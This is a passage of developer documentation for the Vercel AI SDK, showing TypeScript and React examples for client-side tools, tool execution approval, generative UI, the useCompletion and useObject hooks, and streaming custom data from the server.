- The parts array of assistant messages contains tool parts with typed names like tool-askForConfirmation. The client-side tool askForConfirmation is displayed in the UI. It asks the user for confirmation and displays the result once the user confirms or denies the execution. The result is added to the chat using addToolOutput with the tool parameter for type safety.
'use client';
import { useChat } from '@ai-sdk/react';
import {
DefaultChatTransport,
lastAssistantMessageIsCompleteWithToolCalls,
} from 'ai';
import { useState } from 'react';
export default function Chat() {
const { messages, sendMessage, addToolOutput } = useChat({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
sendAutomaticallyWhen: lastAssistantMessageIsCompleteWithToolCalls,
// run client-side tools that are automatically executed:
async onToolCall({ toolCall }) {
// Check if it's a dynamic tool first for proper type narrowing
if (toolCall.dynamic) {
return;
}
if (toolCall.toolName === 'getLocation') {
const cities = ['New York', 'Los Angeles', 'Chicago', 'San Francisco'];
// No await - avoids potential deadlocks
addToolOutput({
tool: 'getLocation',
toolCallId: toolCall.toolCallId,
output: cities[Math.floor(Math.random() * cities.length)],
});
}
},
});
const [input, setInput] = useState('');
return (
<>
{messages?.map(message => (
<div key={message.id}>
<strong>{`${message.role}: `}</strong>
{message.parts.map(part => {
switch (part.type) {
// render text parts as simple text:
case 'text':
return part.text;
// for tool parts, use the typed tool part names:
case 'tool-askForConfirmation': {
const callId = part.toolCallId;
switch (part.state) {
case 'input-streaming':
return (
<div key={callId}>Loading confirmation request...</div>
);
case 'input-available':
return (
<div key={callId}>
{part.input.message}
<div>
<button
onClick={() =>
addToolOutput({
tool: 'askForConfirmation',
toolCallId: callId,
output: 'Yes, confirmed.',
})
}
>
Yes
</button>
<button
onClick={() =>
addToolOutput({
tool: 'askForConfirmation',
toolCallId: callId,
output: 'No, denied',
})
}
>
No
</button>
</div>
</div>
);
case 'output-available':
return (
<div key={callId}>
Location access allowed: {part.output}
</div>
);
case 'output-error':
return <div key={callId}>Error: {part.errorText}</div>;
}
break;
}
case 'tool-getLocation': {
const callId = part.toolCallId;
switch (part.state) {
case 'input-streaming':
return (
<div key={callId}>Preparing location request...</div>
);
case 'input-available':
return <div key={callId}>Getting location...</div>;
case 'output-available':
return <div key={callId}>Location: {part.output}</div>;
case 'output-error':
return (
<div key={callId}>
Error getting location: {part.errorText}
</div>
);
}
break;
}
case 'tool-getWeatherInformation': {
const callId = part.toolCallId;
switch (part.state) {
// example of pre-rendering streaming tool inputs:
case 'input-streaming':
return (
<pre key={callId}>{JSON.stringify(part, null, 2)}</pre>
);
case 'input-available':
return (
<div key={callId}>
Getting weather information for {part.input.city}...
</div>
);
case 'output-available':
return (
<div key={callId}>
Weather in {part.input.city}: {part.output}
</div>
);
case 'output-error':
return (
<div key={callId}>
Error getting weather for {part.input.city}:{' '}
{part.errorText}
</div>
);
}
break;
}
}
})}
<br />
</div>
))}
<form
onSubmit={e => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
}}
>
<input value={input} onChange={e => setInput(e.target.value)} />
</form>
</>
);
}
Error handling
Sometimes an error may occur during client-side tool execution. Use the addToolOutput method with a state of output-error and an errorText value instead of output to record the error.
'use client';
import { useChat } from '@ai-sdk/react';
import {
DefaultChatTransport,
lastAssistantMessageIsCompleteWithToolCalls,
} from 'ai';
import { useState } from 'react';
export default function Chat() {
const { messages, sendMessage, addToolOutput } = useChat({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
sendAutomaticallyWhen: lastAssistantMessageIsCompleteWithToolCalls,
// run client-side tools that are automatically executed:
async onToolCall({ toolCall }) {
// Check if it's a dynamic tool first for proper type narrowing
if (toolCall.dynamic) {
return;
}
if (toolCall.toolName === 'getWeatherInformation') {
try {
const weather = await getWeatherInformation(toolCall.input);
// No await - avoids potential deadlocks
addToolOutput({
tool: 'getWeatherInformation',
toolCallId: toolCall.toolCallId,
output: weather,
});
} catch (err) {
addToolOutput({
tool: 'getWeatherInformation',
toolCallId: toolCall.toolCallId,
state: 'output-error',
errorText: 'Unable to get the weather information',
});
}
}
},
});
}
Tool Execution Approval
Tool execution approval lets you require user confirmation before a server-side tool runs. Unlike client-side tools that execute in the browser, tools with approval still execute on the server—but only after the user approves.
Use tool execution approval when you want to:
- Confirm sensitive operations (payments, deletions, external API calls)
- Let users review tool inputs before execution
- Add human oversight to automated workflows
For tools that need to run in the browser (updating UI state, accessing browser APIs), use client-side tools instead.
Server Setup
Enable approval by setting needsApproval on your tool. See Tool Execution Approval for configuration options including dynamic approval based on input.
import { streamText, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
export async function POST(req: Request) {
const { messages } = await req.json();
const result = streamText({
model: __MODEL__,
messages,
tools: {
getWeather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
city: z.string(),
}),
needsApproval: true,
execute: async ({ city }) => {
const weather = await fetchWeather(city);
return weather;
},
}),
},
});
return result.toUIMessageStreamResponse();
}
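needsApproval can also be computed dynamically from the tool input. A minimal sketch, assuming needsApproval accepts an async predicate over the input (the allowlist rule below is hypothetical):
getWeather: tool({
  description: 'Get the weather in a location',
  inputSchema: z.object({
    city: z.string(),
  }),
  // hypothetical rule: skip approval for an allowlisted city
  needsApproval: async ({ city }) => city !== 'San Francisco',
  execute: async ({ city }) => fetchWeather(city),
}),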
Client-Side Approval UI
When a tool requires approval, the tool part state is approval-requested. Use addToolApprovalResponse to approve or deny:
'use client';
import { useChat } from '@ai-sdk/react';
export default function Chat() {
const { messages, addToolApprovalResponse } = useChat();
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.parts.map(part => {
if (part.type === 'tool-getWeather') {
switch (part.state) {
case 'approval-requested':
return (
<div key={part.toolCallId}>
<p>Get weather for {part.input.city}?</p>
<button
onClick={() =>
addToolApprovalResponse({
id: part.approval.id,
approved: true,
})
}
>
Approve
</button>
<button
onClick={() =>
addToolApprovalResponse({
id: part.approval.id,
approved: false,
})
}
>
Deny
</button>
</div>
);
case 'output-available':
return (
<div key={part.toolCallId}>
Weather in {part.input.city}: {part.output}
</div>
);
}
}
// Handle other part types...
})}
</div>
))}
</>
);
}
Auto-Submit After Approval
Use lastAssistantMessageIsCompleteWithApprovalResponses to automatically continue the conversation after approvals:
import { useChat } from '@ai-sdk/react';
import { lastAssistantMessageIsCompleteWithApprovalResponses } from 'ai';
const { messages, addToolApprovalResponse } = useChat({
sendAutomaticallyWhen: lastAssistantMessageIsCompleteWithApprovalResponses,
});
Dynamic Tools
When using dynamic tools (tools with unknown types at compile time), the UI parts use a generic dynamic-tool type instead of specific tool types:
{
message.parts.map((part, index) => {
switch (part.type) {
// Static tools with specific (`tool-${toolName}`) types
case 'tool-getWeatherInformation':
return <WeatherDisplay part={part} />;
// Dynamic tools use generic `dynamic-tool` type
case 'dynamic-tool':
return (
<div key={index}>
<h4>Tool: {part.toolName}</h4>
{part.state === 'input-streaming' && (
<pre>{JSON.stringify(part.input, null, 2)}</pre>
)}
{part.state === 'output-available' && (
<pre>{JSON.stringify(part.output, null, 2)}</pre>
)}
{part.state === 'output-error' && (
<div>Error: {part.errorText}</div>
)}
</div>
);
}
});
}
Dynamic tools are useful when integrating with:
- MCP (Model Context Protocol) tools without schemas
- User-defined functions loaded at runtime
- External tool providers
Tool call streaming
Tool call streaming is enabled by default in AI SDK 5.0, allowing you to stream tool calls while they are being generated. This provides a better user experience by showing tool inputs as they are generated in real-time.
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: __MODEL__,
messages: await convertToModelMessages(messages),
// toolCallStreaming is enabled by default in v5
// ...
});
return result.toUIMessageStreamResponse();
}
With tool call streaming enabled, partial tool calls are streamed as part of the data stream.
They are available through the useChat hook.
The typed tool parts of assistant messages will also contain partial tool calls.
You can use the state property of the tool part to render the correct UI.
export default function Chat() {
// ...
return (
<>
{messages?.map(message => (
<div key={message.id}>
{message.parts.map(part => {
switch (part.type) {
case 'tool-askForConfirmation':
case 'tool-getLocation':
case 'tool-getWeatherInformation':
switch (part.state) {
case 'input-streaming':
return <pre>{JSON.stringify(part.input, null, 2)}</pre>;
case 'input-available':
return <pre>{JSON.stringify(part.input, null, 2)}</pre>;
case 'output-available':
return <pre>{JSON.stringify(part.output, null, 2)}</pre>;
case 'output-error':
return <div>Error: {part.errorText}</div>;
}
}
})}
</div>
))}
</>
);
}
Step start parts
When you are using multi-step tool calls, the AI SDK will add step start parts to the assistant messages.
If you want to display boundaries between tool calls, you can use the step-start parts as follows:
// ...
// where you render the message parts:
message.parts.map((part, index) => {
switch (part.type) {
case 'step-start':
// show step boundaries as horizontal lines:
return index > 0 ? (
<div key={index} className="text-gray-500">
<hr className="my-2 border-gray-300" />
</div>
) : null;
case 'text':
// ...
case 'tool-askForConfirmation':
case 'tool-getLocation':
case 'tool-getWeatherInformation':
// ...
}
});
// ...
Server-side Multi-Step Calls
You can also use multi-step calls on the server-side with streamText.
This works when all invoked tools have an execute function on the server side.
import { convertToModelMessages, streamText, UIMessage, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: __MODEL__,
messages: await convertToModelMessages(messages),
tools: {
getWeatherInformation: {
description: 'show the weather in a given city to the user',
inputSchema: z.object({ city: z.string() }),
// tool has execute function:
execute: async ({}: { city: string }) => {
const weatherOptions = ['sunny', 'cloudy', 'rainy', 'snowy', 'windy'];
return weatherOptions[
Math.floor(Math.random() * weatherOptions.length)
];
},
},
},
stopWhen: stepCountIs(5),
});
return result.toUIMessageStreamResponse();
}
Errors
Language models can make errors when calling tools. By default, these errors are masked for security reasons, and show up as "An error occurred" in the UI.
To surface the errors, you can use the onError function when calling toUIMessageStreamResponse.
export function errorHandler(error: unknown) {
if (error == null) {
return 'unknown error';
}
if (typeof error === 'string') {
return error;
}
if (error instanceof Error) {
return error.message;
}
return JSON.stringify(error);
}
const result = streamText({
// ...
});
return result.toUIMessageStreamResponse({
onError: errorHandler,
});
In case you are using createUIMessageStream, you can pass the onError function there as well:
const stream = createUIMessageStream({
  async execute({ writer }) {
    // ...
  },
  onError: errorHandler,
});
title: Generative User Interfaces description: Learn how to build Generative UI with AI SDK UI.
Generative User Interfaces
Generative user interfaces (generative UI) let a large language model (LLM) go beyond text and "generate UI". This creates a more engaging and AI-native experience for users.
At the core of generative UI are tools, which are functions you provide to the model to perform specialized tasks like getting the weather in a location. The model can decide when and how to use these tools based on the context of the conversation.
Generative UI is the process of connecting the results of a tool call to a React component. Here's how it works:
- You provide the model with a prompt or conversation history, along with a set of tools.
- Based on the context, the model may decide to call a tool.
- If a tool is called, it will execute and return data.
- This data can then be passed to a React component for rendering.
By passing the tool results to React components, you can create a generative UI experience that's more engaging and adaptive to your needs.
Build a Generative UI Chat Interface
Let's create a chat interface that handles text-based conversations and incorporates dynamic UI elements based on model responses.
Basic Chat Implementation
Start with a basic chat implementation using the useChat hook:
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Page() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat();
const handleSubmit = (e: React.FormEvent) => {
e.preventDefault();
sendMessage({ text: input });
setInput('');
};
return (
<div>
{messages.map(message => (
<div key={message.id}>
<div>{message.role === 'user' ? 'User: ' : 'AI: '}</div>
<div>
{message.parts.map((part, index) => {
if (part.type === 'text') {
return <span key={index}>{part.text}</span>;
}
return null;
})}
</div>
</div>
))}
<form onSubmit={handleSubmit}>
<input
value={input}
onChange={e => setInput(e.target.value)}
placeholder="Type a message..."
/>
<button type="submit">Send</button>
</form>
</div>
);
}
To handle the chat requests and model responses, set up an API route:
import { streamText, convertToModelMessages, UIMessage, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;
export async function POST(request: Request) {
const { messages }: { messages: UIMessage[] } = await request.json();
const result = streamText({
model: __MODEL__,
system: 'You are a friendly assistant!',
messages: await convertToModelMessages(messages),
stopWhen: stepCountIs(5),
});
return result.toUIMessageStreamResponse();
}
This API route uses the streamText function to process chat messages and stream the model's responses back to the client.
Create a Tool
Before enhancing your chat interface with dynamic UI elements, you need to create a tool and corresponding React component. A tool will allow the model to perform a specific action, such as fetching weather information.
Create a new file called ai/tools.ts with the following content:
import { tool as createTool } from 'ai';
import { z } from 'zod';
export const weatherTool = createTool({
description: 'Display the weather for a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async function ({ location }) {
await new Promise(resolve => setTimeout(resolve, 2000));
return { weather: 'Sunny', temperature: 75, location };
},
});
export const tools = {
displayWeather: weatherTool,
};
In this file, you've created a tool called weatherTool. This tool simulates fetching weather information for a given location. This tool will return simulated data after a 2-second delay. In a real-world application, you would replace this simulation with an actual API call to a weather service.
Update the API Route
Update the API route to include the tool you've defined:
import { streamText, convertToModelMessages, UIMessage, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;
import { tools } from '@/ai/tools';
export async function POST(request: Request) {
const { messages }: { messages: UIMessage[] } = await request.json();
const result = streamText({
model: __MODEL__,
system: 'You are a friendly assistant!',
messages: await convertToModelMessages(messages),
stopWhen: stepCountIs(5),
tools,
});
return result.toUIMessageStreamResponse();
}
Now that you've defined the tool and added it to your streamText call, let's build a React component to display the weather information it returns.
Create UI Components
Create a new file called components/weather.tsx:
type WeatherProps = {
temperature: number;
weather: string;
location: string;
};
export const Weather = ({ temperature, weather, location }: WeatherProps) => {
return (
<div>
<h2>Current Weather for {location}</h2>
<p>Condition: {weather}</p>
<p>Temperature: {temperature}°F</p>
</div>
);
};
This component will display the weather information for a given location. It takes three props: temperature, weather, and location (exactly what the weatherTool returns).
Render the Weather Component
Now that you have your tool and corresponding React component, let's integrate them into your chat interface. You'll render the Weather component when the model calls the weather tool.
To check if the model has called a tool, you can check the parts array of the UIMessage object for tool-specific parts. In AI SDK 5.0, tool parts use typed naming: tool-${toolName} instead of generic types.
Update your page.tsx file:
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
import { Weather } from '@/components/weather';
export default function Page() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat();
const handleSubmit = (e: React.FormEvent) => {
e.preventDefault();
sendMessage({ text: input });
setInput('');
};
return (
<div>
{messages.map(message => (
<div key={message.id}>
<div>{message.role === 'user' ? 'User: ' : 'AI: '}</div>
<div>
{message.parts.map((part, index) => {
if (part.type === 'text') {
return <span key={index}>{part.text}</span>;
}
if (part.type === 'tool-displayWeather') {
switch (part.state) {
case 'input-available':
return <div key={index}>Loading weather...</div>;
case 'output-available':
return (
<div key={index}>
<Weather {...part.output} />
</div>
);
case 'output-error':
return <div key={index}>Error: {part.errorText}</div>;
default:
return null;
}
}
return null;
})}
</div>
</div>
))}
<form onSubmit={handleSubmit}>
<input
value={input}
onChange={e => setInput(e.target.value)}
placeholder="Type a message..."
/>
<button type="submit">Send</button>
</form>
</div>
);
}
In this updated code snippet, you:
- Use manual input state management with useState instead of the built-in input and handleInputChange.
- Use sendMessage instead of handleSubmit to send messages.
- Check the parts array of each message for different content types.
- Handle tool parts with type tool-displayWeather and their different states (input-available, output-available, output-error).
This approach allows you to dynamically render UI components based on the model's responses, creating a more interactive and context-aware chat experience.
Expanding Your Generative UI Application
You can enhance your chat application by adding more tools and components, creating a richer and more versatile user experience. Here's how you can expand your application:
Adding More Tools
To add more tools, simply define them in your ai/tools.ts file:
// Add a new stock tool
export const stockTool = createTool({
description: 'Get price for a stock',
inputSchema: z.object({
symbol: z.string().describe('The stock symbol to get the price for'),
}),
execute: async function ({ symbol }) {
// Simulated API call
await new Promise(resolve => setTimeout(resolve, 2000));
return { symbol, price: 100 };
},
});
// Update the tools object
export const tools = {
displayWeather: weatherTool,
getStockPrice: stockTool,
};
Now, create a new file called components/stock.tsx:
type StockProps = {
price: number;
symbol: string;
};
export const Stock = ({ price, symbol }: StockProps) => {
return (
<div>
<h2>Stock Information</h2>
<p>Symbol: {symbol}</p>
<p>Price: ${price}</p>
</div>
);
};
Finally, update your page.tsx file to include the new Stock component:
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
import { Weather } from '@/components/weather';
import { Stock } from '@/components/stock';
export default function Page() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat();
const handleSubmit = (e: React.FormEvent) => {
e.preventDefault();
sendMessage({ text: input });
setInput('');
};
return (
<div>
{messages.map(message => (
<div key={message.id}>
<div>{message.role}</div>
<div>
{message.parts.map((part, index) => {
if (part.type === 'text') {
return <span key={index}>{part.text}</span>;
}
if (part.type === 'tool-displayWeather') {
switch (part.state) {
case 'input-available':
return <div key={index}>Loading weather...</div>;
case 'output-available':
return (
<div key={index}>
<Weather {...part.output} />
</div>
);
case 'output-error':
return <div key={index}>Error: {part.errorText}</div>;
default:
return null;
}
}
if (part.type === 'tool-getStockPrice') {
switch (part.state) {
case 'input-available':
return <div key={index}>Loading stock price...</div>;
case 'output-available':
return (
<div key={index}>
<Stock {...part.output} />
</div>
);
case 'output-error':
return <div key={index}>Error: {part.errorText}</div>;
default:
return null;
}
}
return null;
})}
</div>
</div>
))}
<form onSubmit={handleSubmit}>
<input
type="text"
value={input}
onChange={e => setInput(e.target.value)}
/>
<button type="submit">Send</button>
</form>
</div>
);
}
By following this pattern, you can continue to add more tools and components, expanding the capabilities of your Generative UI application.
title: Completion description: Learn how to use the useCompletion hook.
Completion
The useCompletion hook allows you to create a user interface to handle text completions in your application. It enables the streaming of text completions from your AI provider, manages the state for chat input, and updates the UI automatically as new messages are received.
In this guide, you will learn how to use the useCompletion hook in your application to generate text completions and stream them in real-time to your users.
Example
'use client';
import { useCompletion } from '@ai-sdk/react';
export default function Page() {
const { completion, input, handleInputChange, handleSubmit } = useCompletion({
api: '/api/completion',
});
return (
<form onSubmit={handleSubmit}>
<input
name="prompt"
value={input}
onChange={handleInputChange}
id="input"
/>
<button type="submit">Submit</button>
<div>{completion}</div>
</form>
);
}
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { prompt }: { prompt: string } = await req.json();
const result = streamText({
model: __MODEL__,
prompt,
});
return result.toUIMessageStreamResponse();
}
In the Page component, the useCompletion hook will request to your AI provider endpoint whenever the user submits a message. The completion is then streamed back in real-time and displayed in the UI.
This enables a seamless text completion experience where the user can see the AI response as soon as it is available, without having to wait for the entire response to be received.
Customized UI
useCompletion also provides ways to manage the prompt via code, show loading and error states, and update messages without being triggered by user interactions.
Loading and error states
To show a loading spinner while the chatbot is processing the user's message, you can use the isLoading state returned by the useCompletion hook:
const { isLoading, ... } = useCompletion()
return (
<>
{isLoading ? <Spinner /> : null}
</>
)
Similarly, the error state reflects the error object thrown during the fetch request. It can be used to display an error message, or show a toast notification:
const { error, ... } = useCompletion()
useEffect(() => {
if (error) {
toast.error(error.message)
}
}, [error])
// Or display the error message in the UI:
return (
<>
{error ? <div>{error.message}</div> : null}
</>
)
Controlled input
In the initial example, we have handleSubmit and handleInputChange callbacks that manage the input changes and form submissions. These are handy for common use cases, but you can also use uncontrolled APIs for more advanced scenarios such as form validation or customized components.
The following example demonstrates how to use more granular APIs like setInput with your custom input and submit button components:
const { input, setInput } = useCompletion();
return (
<>
<MyCustomInput value={input} onChange={value => setInput(value)} />
</>
);
Cancelation
It's also a common use case to abort the response message while it's still streaming back from the AI provider. You can do this by calling the stop function returned by the useCompletion hook.
const { stop, isLoading, ... } = useCompletion()
return (
<>
<button onClick={stop} disabled={!isLoading}>Stop</button>
</>
)
When the user clicks the "Stop" button, the fetch request will be aborted. This avoids consuming unnecessary resources and improves the UX of your application.
Throttling UI Updates
This feature is currently only available for React.
By default, the useCompletion hook will trigger a render every time a new chunk is received.
You can throttle the UI updates with the experimental_throttle option.
const { completion, ... } = useCompletion({
// Throttle the completion and data updates to 50ms:
experimental_throttle: 50
})
Event Callbacks
useCompletion also provides optional event callbacks that you can use to handle different stages of the chatbot lifecycle. These callbacks can be used to trigger additional actions, such as logging, analytics, or custom UI updates.
const { ... } = useCompletion({
onFinish: (prompt: string, completion: string) => {
console.log('Finished streaming completion:', completion)
},
onError: (error: Error) => {
console.error('An error occurred:', error)
},
})
Configure Request Options
By default, the useCompletion hook sends an HTTP POST request to the /api/completion endpoint with the prompt as part of the request body. You can customize the request by passing additional options to the useCompletion hook:
const { completion, input, handleInputChange, handleSubmit } = useCompletion({
api: '/api/custom-completion',
headers: {
Authorization: 'your_token',
},
body: {
user_id: '123',
},
credentials: 'same-origin',
});
In this example, the useCompletion hook sends a POST request to the /api/custom-completion endpoint with the specified headers, additional body fields, and credentials for that fetch request. On your server side, you can handle the request with this additional information.
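A minimal sketch of a matching server route that reads the extra body field (the user_id name comes from the example above; how you use it is up to you):
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
export async function POST(req: Request) {
  const { prompt, user_id }: { prompt: string; user_id: string } =
    await req.json();
  // use user_id for logging, per-user rate limiting, etc.
  console.log('completion requested by user', user_id);
  const result = streamText({
    model: __MODEL__,
    prompt,
  });
  return result.toUIMessageStreamResponse();
}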
title: Object Generation description: Learn how to use the useObject hook.
Object Generation
The useObject hook allows you to create interfaces that represent a structured JSON object that is being streamed.
In this guide, you will learn how to use the useObject hook in your application to generate UIs for structured data on the fly.
Example
The example shows a small notifications demo app that generates fake notifications in real-time.
Schema
It is helpful to set up the schema in a separate file that is imported on both the client and server.
import { z } from 'zod';
// define a schema for the notifications
export const notificationSchema = z.object({
notifications: z.array(
z.object({
name: z.string().describe('Name of a fictional person.'),
message: z.string().describe('Message. Do not use emojis or links.'),
}),
),
});
Client
The client uses useObject to stream the object generation process.
The results are partial and are displayed as they are received.
Please note the code for handling undefined values in the JSX.
'use client';
import { experimental_useObject as useObject } from '@ai-sdk/react';
import { notificationSchema } from './api/notifications/schema';
export default function Page() {
const { object, submit } = useObject({
api: '/api/notifications',
schema: notificationSchema,
});
return (
<>
<button onClick={() => submit('Messages during finals week.')}>
Generate notifications
</button>
{object?.notifications?.map((notification, index) => (
<div key={index}>
<p>{notification?.name}</p>
<p>{notification?.message}</p>
</div>
))}
</>
);
}
Server
On the server, we use streamText with Output.object() to stream the object generation process.
import { streamText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { notificationSchema } from './schema';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const context = await req.json();
const result = streamText({
model: __MODEL__,
output: Output.object({ schema: notificationSchema }),
prompt:
`Generate 3 notifications for a messages app in this context:` + context,
});
return result.toTextStreamResponse();
}
Enum Output Mode
When you need to classify or categorize input into predefined options, you can use the enum output mode with useObject. This requires a specific schema structure where the object has enum as a key with z.enum containing your possible values.
Example: Text Classification
This example shows how to build a simple text classifier that categorizes statements as true or false.
Client
When using useObject with enum output mode, your schema must be an object with enum as the key:
'use client';
import { experimental_useObject as useObject } from '@ai-sdk/react';
import { z } from 'zod';
export default function ClassifyPage() {
const { object, submit, isLoading } = useObject({
api: '/api/classify',
schema: z.object({ enum: z.enum(['true', 'false']) }),
});
return (
<>
<button onClick={() => submit('The earth is flat')} disabled={isLoading}>
Classify statement
</button>
{object && <div>Classification: {object.enum}</div>}
</>
);
}
Server
On the server, use streamText with Output.choice() to stream the classification result:
import { streamText, Output } from 'ai';
__PROVIDER_IMPORT__;
export async function POST(req: Request) {
const context = await req.json();
const result = streamText({
model: __MODEL__,
output: Output.choice({ options: ['true', 'false'] }),
prompt: `Classify this statement as true or false: ${context}`,
});
return result.toTextStreamResponse();
}
Customized UI
useObject also provides ways to show loading and error states:
Loading State
The isLoading state returned by the useObject hook can be used for several
purposes:
- To show a loading spinner while the object is generated.
- To disable the submit button.
'use client';
import { experimental_useObject as useObject } from '@ai-sdk/react';
export default function Page() {
const { isLoading, object, submit } = useObject({
api: '/api/notifications',
schema: notificationSchema,
});
return (
<>
{isLoading && <Spinner />}
<button
onClick={() => submit('Messages during finals week.')}
disabled={isLoading}
>
Generate notifications
</button>
{object?.notifications?.map((notification, index) => (
<div key={index}>
<p>{notification?.name}</p>
<p>{notification?.message}</p>
</div>
))}
</>
);
}
Stop Handler
The stop function can be used to stop the object generation process. This can be useful if the user wants to cancel the request or if the server is taking too long to respond.
'use client';
import { experimental_useObject as useObject } from '@ai-sdk/react';
export default function Page() {
const { isLoading, stop, object, submit } = useObject({
api: '/api/notifications',
schema: notificationSchema,
});
return (
<>
{isLoading && (
<button type="button" onClick={() => stop()}>
Stop
</button>
)}
<button onClick={() => submit('Messages during finals week.')}>
Generate notifications
</button>
{object?.notifications?.map((notification, index) => (
<div key={index}>
<p>{notification?.name}</p>
<p>{notification?.message}</p>
</div>
))}
</>
);
}
Error State
Similarly, the error state reflects the error object thrown during the fetch request.
It can be used to display an error message, or to disable the submit button:
'use client';
import { experimental_useObject as useObject } from '@ai-sdk/react';
export default function Page() {
const { error, object, submit } = useObject({
api: '/api/notifications',
schema: notificationSchema,
});
return (
<>
{error && <div>An error occurred.</div>}
<button onClick={() => submit('Messages during finals week.')}>
Generate notifications
</button>
{object?.notifications?.map((notification, index) => (
<div key={index}>
<p>{notification?.name}</p>
<p>{notification?.message}</p>
</div>
))}
</>
);
}
Event Callbacks
useObject provides optional event callbacks that you can use to handle life-cycle events.
- onFinish: Called when the object generation is completed.
- onError: Called when an error occurs during the fetch request.
These callbacks can be used to trigger additional actions, such as logging, analytics, or custom UI updates.
'use client';
import { experimental_useObject as useObject } from '@ai-sdk/react';
import { notificationSchema } from './api/notifications/schema';
export default function Page() {
const { object, submit } = useObject({
api: '/api/notifications',
schema: notificationSchema,
onFinish({ object, error }) {
// typed object, undefined if schema validation fails:
console.log('Object generation completed:', object);
// error, undefined if schema validation succeeds:
console.log('Schema validation error:', error);
},
onError(error) {
// error during fetch request:
console.error('An error occurred:', error);
},
});
return (
<div>
<button onClick={() => submit('Messages during finals week.')}>
Generate notifications
</button>
{object?.notifications?.map((notification, index) => (
<div key={index}>
<p>{notification?.name}</p>
<p>{notification?.message}</p>
</div>
))}
</div>
);
}
Configure Request Options
You can configure the API endpoint, optional headers and credentials using the api, headers and credentials settings.
const { submit, object } = useObject({
api: '/api/use-object',
headers: {
'X-Custom-Header': 'CustomValue',
},
credentials: 'include',
schema: yourSchema,
});
title: Streaming Custom Data description: Learn how to stream custom data from the server to the client.
Streaming Custom Data
It is often useful to send additional data alongside the model's response. For example, you may want to send status information, the message ids after storing them, or references to content that the language model is referring to.
The AI SDK provides several helpers that allow you to stream additional data to the client and attach it to the UIMessage parts array:
- createUIMessageStream: creates a data stream
- createUIMessageStreamResponse: creates a response object that streams data
- pipeUIMessageStreamToResponse: pipes a data stream to a server response object
The data is streamed as part of the response stream using Server-Sent Events.
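If your server works with Node.js ServerResponse objects instead of web Response objects, pipeUIMessageStreamToResponse writes the same stream to the response. A minimal sketch, assuming an Express-style handler (the notification payload is illustrative):
import { createUIMessageStream, pipeUIMessageStreamToResponse } from 'ai';
import type { ServerResponse } from 'node:http';
function handler(res: ServerResponse) {
  const stream = createUIMessageStream({
    execute: ({ writer }) => {
      // Write any UI message chunks, e.g. a transient notification
      writer.write({
        type: 'data-notification',
        data: { message: 'Processing...', level: 'info' },
        transient: true,
      });
    },
  });
  // Pipe the UI message stream to the Node.js server response
  pipeUIMessageStreamToResponse({ response: res, stream });
}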
Setting Up Type-Safe Data Streaming
First, define your custom message type with data part schemas for type safety:
import { UIMessage } from 'ai';
// Define your custom message type with data part schemas
export type MyUIMessage = UIMessage<
never, // metadata type
{
weather: {
city: string;
weather?: string;
status: 'loading' | 'success';
};
notification: {
message: string;
level: 'info' | 'warning' | 'error';
};
} // data parts type
>;
Streaming Data from the Server
In your server-side route handler, you can create a UIMessageStream and then pass it to createUIMessageStreamResponse:
import {
createUIMessageStream,
createUIMessageStreamResponse,
streamText,
convertToModelMessages,
} from 'ai';
__PROVIDER_IMPORT__;
import type { MyUIMessage } from '@/ai/types';
export async function POST(req: Request) {
const { messages } = await req.json();
const stream = createUIMessageStream<MyUIMessage>({
execute: async ({ writer }) => {
// 1. Send initial status (transient - won't be added to message history)
writer.write({
type: 'data-notification',
data: { message: 'Processing your request...', level: 'info' },
transient: true, // This part won't be added to message history
});
// 2. Send sources (useful for RAG use cases)
writer.write({
type: 'source',
value: {
type: 'source',
sourceType: 'url',
id: 'source-1',
url: 'https://weather.com',
title: 'Weather Data Source',
},
});
// 3. Send data parts with loading state
writer.write({
type: 'data-weather',
id: 'weather-1',
data: { city: 'San Francisco', status: 'loading' },
});
const result = streamText({
model: __MODEL__,
messages: await convertToModelMessages(messages),
onFinish() {
// 4. Update the same data part (reconciliation)
writer.write({
type: 'data-weather',
id: 'weather-1', // Same ID = update existing part
data: {
city: 'San Francisco',
weather: 'sunny',
status: 'success',
},
});
// 5. Send completion notification (transient)
writer.write({
type: 'data-notification',
data: { message: 'Request completed', level: 'info' },
transient: true, // Won't be added to message history
});
},
});
writer.merge(result.toUIMessageStream());
},
});
return createUIMessageStreamResponse({ stream });
}
Types of Streamable Data
Data Parts (Persistent)
Regular data parts are added to the message history and appear in message.parts:
writer.write({
type: 'data-weather',
id: 'weather-1', // Optional: enables reconciliation
data: { city: 'San Francisco', status: 'loading' },
});
Sources
Sources are useful for RAG implementations where you want to show which documents or URLs were referenced:
writer.write({
type: 'source',
value: {
type: 'source',
sourceType: 'url',
id: 'source-1',
url: 'https://example.com',
title: 'Example Source',
},
});
Transient Data Parts (Ephemeral)
Transient parts are sent to the client but not added to the message history. They are only accessible via the useChat onData handler:
// server
writer.write({
type: 'data-notification',
data: { message: 'Processing...', level: 'info' },
transient: true, // Won't be added to message history
});
// client
const [notification, setNotification] = useState();
const { messages } = useChat({
onData: ({ data, type }) => {
if (type === 'data-notification') {
setNotification({ message: data.message, level: data.level });
}
},
});
Data Part Reconciliation
